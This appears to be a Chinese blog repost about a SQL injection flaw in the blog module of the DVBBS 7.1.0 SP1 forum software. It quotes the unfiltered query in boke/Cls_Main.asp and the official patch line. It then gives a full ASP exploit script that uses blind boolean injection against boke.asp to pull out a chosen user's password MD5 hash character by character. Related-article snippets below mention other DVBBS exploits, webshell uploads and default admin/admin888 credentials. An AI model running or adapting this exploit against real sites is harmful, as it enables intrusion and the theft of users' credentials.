DVBBS 7.1.0 SP1 博客漏洞

最新推荐文章于 2021-12-31 21:10:14 发布
最新推荐文章于 2021-12-31 21:10:14 发布
阅读量1.2k 收藏
点赞数
分类专栏: 网络安全-漏洞溢出 文章标签: sql function join 脚本 path user
本文分析了一个存在于ASP脚本中的SQL注入漏洞,详细展示了利用该漏洞读取数据库密码MD5值的过程。通过构造特定的HTTP请求,攻击者能够绕过过滤获取敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >



 转述如下:
boke/Cls_Main.asp 未过滤“'”,可以产生以下问题:

Sql = "Select UserID,UserName,NickName,BokeName,PassWord,BokeTitle,BokeChildTitle,BokeNote,JoinBokeTime,PageView,TopicNum,FavNum,PhotoNum,PostNum,TodayNum,Trackbacks,SpaceSize,XmlData,SysCatID,BokeSetting,LastUpTime,SkinID,Stats,S.S_SkinName,S.S_Path,S.S_ViewPic,S.S_Info,S.S_Builder From [Dv_Boke_User] U Inner Join [Dv_Boke_Skins] S On U.SkinID = S.S_ID"
Sql = Lcase(Sql)
If BokeName<>"" Then
Sql = Sql & " where BokeName = '"&BokeName&"'"
ElseIf BokeUserID>0 Then
Sql = Sql & " where UserID = "&BokeUserID
Else
'请选取相关的DVBOKE,返回综合列表
Exit Sub
End If

官方补丁已经出现
boke/Cls_Main.asp 加入了以下代码
ArchiveLink = Replace(ArchiveLink,"'","")

利用脚本:
<br><br>
<br><br>
<br><br>
<center>
<div align='left' style="width:500px;font-size:12px;">
<%
'==================================================
'
'请将 http://www.target.com/boke.asp 修改为有漏洞的URL
' 将 admin 改为您要读取密码的用户ID
'
'==================================================
Server.ScriptTimeout=300
Response.Buffer = True
Dim hehefulsh
Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
tempstr=""

for total=0 to 15
for theoffset=0 to 15
templen=0
OpenURL="http://www.target.com/boke.asp?admin'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")and''='.index.html.index.html"
hehefulsh.Open "Get",OpenURL, False, "", ""
hehefulsh.Send
GetPage = BytesToBstr(hehefulsh.ResponseBody)
If InStr(GetPage,"该博客用户不存在或填写的资料有误!")=0 Then
tempstr=tempstr & charhex(theoffset)
response.write "前" & total+1 & "位MD5值为:" & tempstr & " 其他密码正在读取中,请等待。。。<BR>"
Response.Flush
Exit for
End if
Next
Next
response.write "<br><br><br>成功读取密码的MD5值,为:" & tempstr & " <BR><BR><BR>请不要使用本程序进行破坏行为!"
Set hehefulsh = Nothing

Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function

%>
</div>
</center>
dvbbs7.1sp1最新漏洞的研究和利用
孤剑之家
06-05 5182
[怪狗] 发表于2006-05-12 00:02
dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞
动性忍心
07-04 1692
动网官方与站长站均存在严重漏洞,可大致入侵,内有说名,请尽快修复!dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞dvbbs 7.1.0 的cookie存在泄露站点的绝对路径的漏洞,攻击者可以配合其它技术,实现sql跨库查询等。漏洞利用例子:一、泄露绝对漏洞测试:对官方的测试站点:bbs.dvbbs.net上传一张图,代码如下:gif89a[code]<script>aler
DVBBS7.0sp2宝贝工作室修改版killcache.asp漏洞
BaiShi 在路上
09-14 2973
                                                                         ----------BaiShiF.W在X第9期指出了利用DVBBS大唐社区美化版中的查件KEY.asp来修改管理员密码入侵DVBBS的方法。我无意间见到了DVBBS宝贝工作室修改版。发现其也有这样的一个插件killcache.asp。不同的是没有新
dvbbs7.1 sp1最新savepost.asp漏洞的研究和利用
动性忍心
05-14 4342
动网论坛(DVBBS 7.1.0 SP1)Savepost.asp存在严重漏洞10-May-06发现:Bug.Center.Team严重程度:严重厂商名称:动网论坛(DVBBS)程序版本:DVBBS 7.1.0 SP1漏洞分析:  因为程序在savepost.asp文件中变量过滤不严,导致数据库处理产生漏洞,可以取得论坛所有权限以及webshell。已经提交官方审核,并通过确认,补丁已经公布厂商补
浏览器解析问题造成的存储型跨站漏洞(DVBBS为例)
u010956354的专栏
12-12 749
参考:http://www.2cto.com/Article/201305/207379.html 先说说浏览器的对于标签的解析。   文本段 1文本段 2文本段 3 1.解析中解析到的时候先把文本段1入栈。 2.解析到b的结束标签后把文本2入栈。 3.解析出a的结束标签再把文本3入栈。 所以一些流行的技术是通过一些优先级高的标签截断。 这里谈的
动网论坛 v7.1.0 SP1 一线天美化版
03-18
1.程序内核:2005年11月26DvBBSV7.1sp1 2.默认管理员:Admin,密码:admin888 3.功能说明: &nbsp;(1)本版适合不喜欢或不必要安装插件,不太会做修改美化的新手 &nbsp;(2)本版在动网原版基础上做了些修改美化,安装了悠悠蓝风格...
火车头 V3_Dvbbs_7.1.0_Sp1 模块及发布注意事项 下载
10-01
【火车头 V3_Dvbbs_7.1.0_Sp1 模块及发布注意事项】 火车头是一款广泛应用于互联网数据抓取、处理和发布的工具,适用于多种论坛平台,其中包括动网论坛(Dvbbs)的7.1.0_SP1版本。在使用火车头与动网论坛结合进行...
数字证书登录for dvbbs 7.1.0 sp1
12-27
数字证书登录for dvbbs 7.1.0 sp1
Dvbbs7.1.0_SQL
03-18
默认管理帐号:用户名:admin,密码:admin888
P2P网络电视插件for dvbbs 7.1.0 sp1
06-03
着个好,大家都来下这个啊,信赖啊
致远 协同管理软件 V7.1SP1 系统安全注意事项.pdf
04-08
致远 协同管理软件 V7.1SP1 系统安全注意事项.pdf
陌生剧场 动网论坛7.1插件美化版
12-27
修改更新:(内核Dvbbs 7.1.0)<br> 1. 安装社区银行 <br> 2. 安装社区股市 <br> 3. 安装社区礼堂<br> 4. 安装社区法院<br> 5. 安装社区门派<br> 6. 安装社区警局 <br> 7. 安装广告公司<br> 8. 安装宠物中心<br> 9. 安装许愿插件<br> 10. 安装勋章中心 <br> 11. 安装管理团队 <br> 12. 安装自助链接<br> 13. 安装BT发布页<br> 14. 安装流量统计<br> 15. 安装在线游戏<br> 16. 安装魔法表情<br> 17. 安装影视中心<br> 18. 安装论坛底部播放器<br> 19. 论坛实现等级按照性别图片和等级名称性别分离化实现区分等级修改(美化)<br> 20. 安装发帖回帖80例随机事件插件<br> 21. 帖子中用户栏美化<br> 22. 安装三列带后台社区明星<br> 23. 安装社区点歌<br> 24. 更新IP数据库20050805<br> 25. 打上安全补丁For Ver7.1[2005-7-4]<br> 26. 删除默认风格 <br> 27. 删除顶部支付宝<br> 28. 删除底部FLASH广告<br> 29. 删除底部阿里巴巴 <br> 30. 关闭删除了购买论坛点券部分链接<br> 31. 更换默认发帖心情图片<br> 32. 安装了自然之韵(风格)<br> 33. 美化修改分离在线图例性别星座<br> 34. 安装简繁体转换改变字号插件<br> 35. 安装存点积分<br> 36. 安装网络电视<br> 37. 安装虚拟形象<br> 38. 安装在线等级及活跃度<br> 39. 安装首页斑竹在线显示<br> 40. 首页添加FLASH时钟<br> 41. 安装易可贴V1.3<br> 42. 安装巧嘴娃娃<br> 43. 安装特殊帖<br> 44. 安装下载中心<br> 45. 安装翻唱Show<br> 46. 修改只允许客人看到部分帖子<br> 47. 更新实现金币与金钱、经验、魅力、点券的相互兑换<br> 48. 制作比较完整的修改说明<br> 其实这个论坛能开发的地方很多,本人时间精力有限,所以暂时只做这么多,因为修改的地方较多,修改说明是之后写的所以修改里面可能会有遗漏没写上的,声明本论坛程序所安装的插件版权归原作者所有,本人只是做了收集安装.<br> [安装必读]<br> 1、首先把所有的程序全部传到你的服务器上<br> 2、你可以把所有文件放在你的网站根目录下,也可以用虚拟目录来运行,同样都可以支持。<br> 3、默认管理员用户名 admin、密码 admin888 4、注意:你的服务器最好支持FSO。 程序修改:陌生感觉
动网论坛7.1sp1,博客存在安全漏洞及解决
yadier的专栏 -YADI理想年代-梦想的追逐者
02-22 1773
我们在boke.asp文件后边的参数加入"",如 boke.asp?lantian.index.html 加个"" 变成boke.asp?lantian.index.html,发现报错。这一下为sql注入开了方便之门。分析boke.asp等文件得知,读取查询参数的语句在boke/Cls_Main.asp中,打开此文件,发现Request.ServerVariables("QUERY_
利用动网论坛dvBBS漏洞上传webshell
Jim的博客
08-20 4405
动网论坛一直是国内比较受欢迎的ASP论坛程序 下载数据库查看DV_upfile数据表,搜索F_ID字段得到php文件地址(前提是知道数据库地址,并且可下载,一般数据库默认地址为/data/dvbbs8.mdb) 1.      通过注入点获得网站的后台账号和密码,但没有找到后台登录地址 2.      下载动网论坛数据库,一般默认地址是/data/dvbbs8.mdb 3.      读取
不为人知的动网7.1 SQL版注入漏洞(图)(anqn)
jahn的专栏
10-13 1607
话说上期X档案刊登了动网8.0 SQL版最新注入漏洞的文章,不知大家都掌握了没有,令人兴奋的是,没过几在就又暴出了另一个动网7.1 SQL版的最新注入漏洞,这个漏洞可以直接更改任意用户的密码或直接添加论坛管理员,危害相当严重!存在漏洞的文件为dv_dpo.asp,有兴趣的朋友可以自行阅读该文件的源代码并分析漏洞的形成原因。本文则主要介绍如何利用工具针对该漏洞进行入侵测试以及如何在动网7.1 SQL
Dvbbs Version 8.2.0 漏洞
热门推荐
stilling2006的专栏
07-19 2万+
影响版本: Powered By Dvbbs Version 8.2.0 Powered By Dvbbs Version 8.1.0 Powered By Dvbbs Version 8.0.0 还是批量,直接Google上面的任一 注册用户-我的主页-个人空间管理 userspace.asp?sid=0&act=modifyset 然后编辑CSS风格【一定要有看到代码才算
动网论坛上传文件漏洞的原理以及攻击的代码实现
Drowning的专栏
10-31 1352
动网论坛上传文件漏洞的原理以及攻击的代码实现                                                                ----Zwell                                                                ---http://www.54nb.com    最近一段时间比较忙,没什么时间
致远OA漏洞复现
混子
12-31 5万+
近段时间,Log4j2比较热,像极了XSS到处插,插完,dnslog就可能会给你满意的答案,有的安全人员已经整出了burp Log4j2的插件,想必小伙伴们都用过了,也是相当巴适。在这个热度居高不下的情况下,有人发现了致远OA也存在该漏洞,抱着试试的想法,尝试了下,真香。趁着Log4j2的机会,就把致远OA的历史漏洞复现一下,并写了批量url检测是否存在以下漏洞(https://github.com/Xd-tl/Seeyon_POC)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值